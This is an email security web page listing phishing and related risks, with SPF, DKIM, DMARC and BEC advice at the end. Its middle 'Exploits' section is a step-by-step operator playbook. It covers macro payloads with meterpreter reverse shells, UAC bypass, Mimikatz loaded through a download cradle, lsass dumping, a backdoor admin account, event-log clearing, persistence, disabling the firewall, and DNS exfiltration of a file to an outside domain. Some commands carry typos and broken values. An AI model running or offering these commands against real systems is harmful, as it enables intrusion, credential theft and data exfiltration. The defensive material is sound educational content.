Category: Email Security

Email Security (Exploits, Vulnerabilities and Mitigation)

Email Security (Exploits, Vulnerabilities and Mitigation)

Email Security Risks in 2022

Over 60% of attacks are via Email using File-less techniques such as (LOLBAS, Phishing, drive-by-downloads, credential theft/account takeovers.)

If it hits your disks its too late.

1- Spoofing and Phishing

E-mail spoofing happens when a cybercriminal sends an e-mail to a user masquerading as someone the user knows. E-mail spoofing to the original sender is easy to accomplish and extremely difficult to trace.

Phishing is another hazardous method used to mislead customers into giving cybercriminals personal data like bank accounts or social security numbers. Cybercriminals sometimes add pictures and trademarks that seem more genuine and authentic. They even create a connection that appears natural. It leads users to a fake website, though. As spoofing and phishing are two of cybercriminals’ most common attack techniques, customers need to be informed of the accessible anti-phishing solution.

2- Vulnerabilities in E-mail Security

Vulnerabilities in e-mail services induced by provider misconfigurations need to be identified. When exploiting e-mail service vulnerabilities, they penetrate the target system, expose information, and make the system inaccessible.

3- Domain’s squatting

Squatting is the registration, sale, or use of a domain name to profit from another party’s brand. As a consequence, companies and their customers may become targets for domain squatting and targeted spear phishing.

4-Client-Side Attacks

The channels of attacks against Internet users are increasing every day. A single link with malicious information may capture a computer. The safety of the components of the e-mail service must be enhanced, and anti-phishing measures such as team member training and simulation of e-mail threats must be introduced.

5-Dangerous Files

If harmful information is received from the user via an e-mail attachment, he may take over the whole computer system and network. These files must be examined using an anti-virus and behavioral analysis program based on signatures to guarantee an efficient solution against phishing.

6-Crypto-ransomware

A ransom must be paid once infected to unlock all encrypted data. In this respect, the e-mail service must be strengthened, and the analytical services must be expected to detect and avoid ranking-specific behaviors.

7- Configuration Errors

This is a pervasive security problem. A poorly configured e-mail service may lead to a big issue by enabling e-mail to be delivered without authentication.

For example, a cybercriminal without authentication access to your e-mail service may send a random e-mail to one of your employees. A cybercriminal who embodies the CEO may be more likely to succeed.

8- Browser Exploit Kit

E-mails with known vulnerabilities in the internet browser may lead to identity theft, data leakage, and access problems. Sometimes a link may include an exploited piece of code. In this situation, protection steps must be taken by the e-mail service and security components.

9- Spear Phishing attacks and Business E-mail Compromise (BEC)

Another crucial problem is that a cyber thief who circumvents all security measures uses the ignorance of the end-user to attack the system. Because 97% of the world’s population cannot recognize a sophisticated phishing e-mail. Users should be regularly informed about hazards via phishing tests, exams, surveys, and games.

10-File Format Exploits

Furthermore, file format vulnerabilities have become an essential source of information security threats for an increasing number of companies. Attackers that exploit these vulnerabilities create malicious files that cause application problems (such as buffer overflows). These vulnerabilities are critical since they frequently impact multiple systems. For example, an attacker may create a single malicious PDF file that infects Windows, Macintosh, and Linux systems via a vulnerability in Adobe Acrobat file format.

Exploits

Phishing Email Attached Demo – Fileless Attack using LOLBs and Social Engineering Toolkit – Demo

Here is a demo of creating a Phishing Email Fileless attack using Kali linux, Metaspolit, Social Engineering Tools kit and LOLBs techniques (Creates Macro attacks based on LOLBS powershell bypass cradles).

File-less Word attachment Attack

---------
[UPDATE METASPL0IT]
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erdb > msfinstall && \chmod 755 msfinstall && \ ./msfinstall
---------
---------
---------
Unicorn - https://github.com/trustedsec/unicorn
git clone https://github.com/trustedsec/unicorn
---------
git clone https://github.com/trustedsec/unicorn
python unicorn.py windows/meterpreter/reverse_https [kali Ip address] 443 macro
sudo msfconsole -r unicorn.rc

---------
Copy maro powershell_attack.txt into Word attachment. 
Open Word / Developer / Macros / Create / Auto_Open / insert payload .
https://www.techtoolsforwriters.com/how-to-add-a-macro-to-word/
---------
outlook.exe /PIM "CS2"

---------
sessions -i 1
load priv stdapi extapi

getuid
getsystem
background 
use windows/local/bypassuac_sluihijack
set SESSION 1
exploit
getuid
getsystem

---------
execute -H -c -f "C:\\windows\\sysnative\\notepad.exe"
migrate 7584
shell
---------

whoami
ping -m 1 8.8.8.8
net1 group "Domain Admins" /domain
bitsadmin /transfer updates /download /priority normal https://urlzs.com/vMceQ C:\Users\Public\1.exe
cd C:\Users\Public\

REM - Above command downloads pd64.exe ProcessDump"

1.exe -accepteula -ma lsass.exe lsass.dmp

makecab "lsass.dmp"  "2.cab" /L "c:\Users\public"
---------

Phishing File-less Attack (Java Rhino) Story

---------

sudo setoolkit
1
2
6
2
no
172.17.0.21 "kali IP"
www.1password.com
1
2
7
1
443
1
2
21
y
SET Output
interact
---------
sessions 1
shell
whoami
systeminfo
ping -n 1 misdeppartment.com "FANCY BEAR"
ping -n 1 carbon2u.com "FANCY BEAR"
ping -n 1 adobeincorp.com "FANCY BEAR"
ping -n 1 gorodkoff.com "ZOOMBIE SPIDER"
ping west.ics-no.org "PUTTER PANDA"

ipconfig /all
wmic useraccount get /ALL
net user /add Trevor SmshBgr123
net localgroup administrator Trevor /add

C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowStyle Hidden -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient.DownloadString('  https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-MimiKatz -DumpCreds"

mshta https://secure.eicar.org.eicar.ps1

fsquirt.exe

tasklist /svc /FI "ImageName eq lsass*"
C:\Windows\system32\rundll32.exe c:\windows\System33\comsvcs.dll, MiniDump <LSASS PID> c:\lsass.dmp full

wevtutil cl System
wevtutil cl Security
wevtutil cl Setup
weveutil cl Application

exit
uoload /home/ect-user/backdoor,exe c:\\windows]\temp
shell



cd c:\windows]\temp
backdoor.exe
exit

run persistence -U -i 5 -p 443 -r 172.17.0.21
run post/windows/gather/arp_scanner RHOSTS=172.17.0.0/24
---------

background

user exploit/windows/local/wmi
set RHOSTS 172.17.0.280172.17.0.30
set SESSION 2
set smbUser demo
set SMBPass password
expolit
---------
Example

Example – https://bluepurple.substack.com/p/bluepurple-pulse-week-ending-august-288

Living of the Land Exploits 

https://lolbas-project.github.io/
https://threathunterplaybook.com/introduction.html
https://car.mitre.org/analytics/CAR-2019-04-003/
https://github.com/Arno0x/DNSExfiltrator

---------
git clone https://github.com/Arno0x/DNSExfiltrator.git
cd DNSExfiltrator
pip install -r requiremnets.txt

chmod 777 dnsexfiltrator.py
sudo ./dnsexfiltrator.py -d www.baconandcheese.com -p Steal1!


msfconsole 
exploit (windows/smb/ms17_010_psexec) > run

mkdir C:\\Dell
mkdir C:\\Dell\\Drivers
mkdir C:\\Dell\\Drivers\\R01161974

upload /root/Desktop/DNSExfiltrator/dnsExfiltrator.js  C:\\Dell\\Drivers\\R01161974
upload /root/Desktop/DNSExfiltrator/Invoke-DNSExfiltrator.ps1  C:\\Dell\\Drivers\\R01161974
upload /root/Desktop/DNSExfiltrator/dnsExfiltrator.exe  C:\\Dell\\Drivers\\R01161974
upload /root/Desktop/DNSExfiltrator/dnsExfiltrator.dll   C:\\Dell\\Drivers\\R01161974

shell
cscript.exe dnsExfiltrator.js "C:\Users\demo\Desktop\file.xls" wwww.beachandcheese.com Steal1!

load powhershell
powershell_execute "Import-Module C:\\Dell\\Drivers\\R01161974\\Invoke-DNSExfiltrator.ps1"
powershell_execute "Invoke-DNSExfiltrator -I C:\\Dell\\Drivers\\file.xls -d www.baconandcheese.com -p Steal1!"
---------

Reconnaissance: 
whoami
net shares
net users
systeminfo
findstr /B .C::Domain"
net localgroup administrators
net view
net group "Domain Admins" /domain
nltest /domain_trusts

powershell.(nslookup -q=txt http://owned.domain.com)[-1]

Disabling Firewall
CMD : "C:\Windows\system32\netsh.exe" Advfirewall set all profiles state off

Detection

  • Impossible Travel, SaaS Email can be accessed all over the world, yet a single user account that is accessed by a single human, will follow pattern that is usually from a single location and most likely not from different geolocation at the same time. So detection geolocations for impossible travel its a good option.
  • Checking Phishing Mail by (SPF, DKIM, and DMARC).
  • Sender Policy Framework (SPF) is an email authentication standard that allows domain owners to specify which servers are authorized to send email with their domain in the “Make From:” email address. SPF allows receiving email systems to query DNS to retrieve the list of authorized servers for a given domain. If an email message arrives via an authorized server, the receiver can consider the email legitimate.
  • Domain-based Message Authentication, Reporting & Conformance (DMARC) is an email authentication standard that works as a policy layer for SPF and DKIM to help email receiving systems recognize when an email isn’t coming from a company’s approved domains, and provides instructions to email receiving systems with email on how to safely dispose of unauthorized email.
  • Brand Indicators for Message Identification (BIMI) is an email specification that works in conjunction with DMARC to enable companies to have their logos displayed next to their email messages in a recipient’s email client. Not only does this enhance brand visibility in crowded inboxes, it also verifies that the email is legitimate and comes from a trusted source.
  • Adding DKIM, SPF, DMARC or BIMI to a single domain is relatively easy and takes just a few moments. But applying them across all the domains in an organization’s entire email ecosystem can get complicated and costly—fast. This is especially true when you’re talking about thousands of domains across numerous divisions and third-party email partners at a large enterprise, so they need to leverage a more comprehensive and automated solution.
    • SPF, DKIM, and DMARC are email authentication protocols that are used to help prevent email fraud and protect email users from receiving fraudulent or malicious emails.
    • ✔ SPF (Sender Policy Framework) is a protocol that allows an email receiver to verify that incoming mail from a domain is being sent from a server authorized by that domain’s administrators.
    • – https://lnkd.in/dPYt32EW
    • – https://lnkd.in/dmhVgm3K
    • ✔ DKIM (DomainKeys Identified Mail) is another email authentication protocol that allows email receivers to verify that incoming email messages are authentic and have not been altered in transit. DKIM works by adding a digital signature to the email message header that is generated by the sending mail server.
    • – https://lnkd.in/dp9SryfH
    • – https://lnkd.in/duMSP-FA
    • ✔ DMARC (Domain-based Message Authentication, Reporting & Conformance) is a protocol that builds on SPF and DKIM to provide better email authentication and protection against phishing and other email-based attacks. DMARC allows domain owners to specify how their emails should be handled if they fail SPF or DKIM checks.
    • – https://lnkd.in/dp9SryfH
    • – https://lnkd.in/duMSP-FA
    • 🎁 For more Investigation/Analysis Mail Header:
    • ✔ TOP FREE Online Checking on Phishing Mail – https://lnkd.in/dxXeDQbj
    • ✔ URL shortened Check – https://lnkd.in/d3VS3trE
    • ✔ Phishing Email Analysis – https://lnkd.in/dfscKs4n
    • ✔ Basic of Mail Analysis/Header – https://lnkd.in/dTBtd99R

Tools

Business Email Compromise (BEC) 

Australians and Australian businesses should be aware of Business Email Compromise (BEC) threats this tax time. BEC occurs when cybercriminals access email accounts to steal your sensitive and financial information, or commit fraud by impersonating employee or company email accounts to obtain money or data. 

What can you do?

Preventative and protective measures are simple, cost effective and immediately beneficial.

The ACSC is encouraging Australian individuals and businesses to strengthen their email security by taking the following steps:

  • Set secure passphrases for each account.
  • Set-up multi-factor authentication.
  • Exercise caution when opening attachments or links.
  • Think critically before actioning requests for money or sensitive information.
  • If you’re a business, establish clear processes for workers to verify and validate requests for payment and sensitive information.

Use the ACSC’s learning resources  

Individuals and businesses can learn how to protect their email accounts and know what to do after an email attack by using our easy-to-follow guides found here, including:

Protect your Personal Email.

Outlook and Gmail Email Security Checks

It’s always a good idea to check your email accounts for unusual activity;

Use the following links to check this your self;

Some banks and crypto accounts allow – Geo-locking. (Detect impossible travel.)

Set an extremely difficult maximum length password for all your personal email accounts.

Remember all of your Bank accounts are probably linked to a free email service and anyone with access to your email could request a new password to all of your accounts.  Most banks don’t even have MFA. Have a good sleep.

Setup Yubikey based on FIDO and buy a few for your family.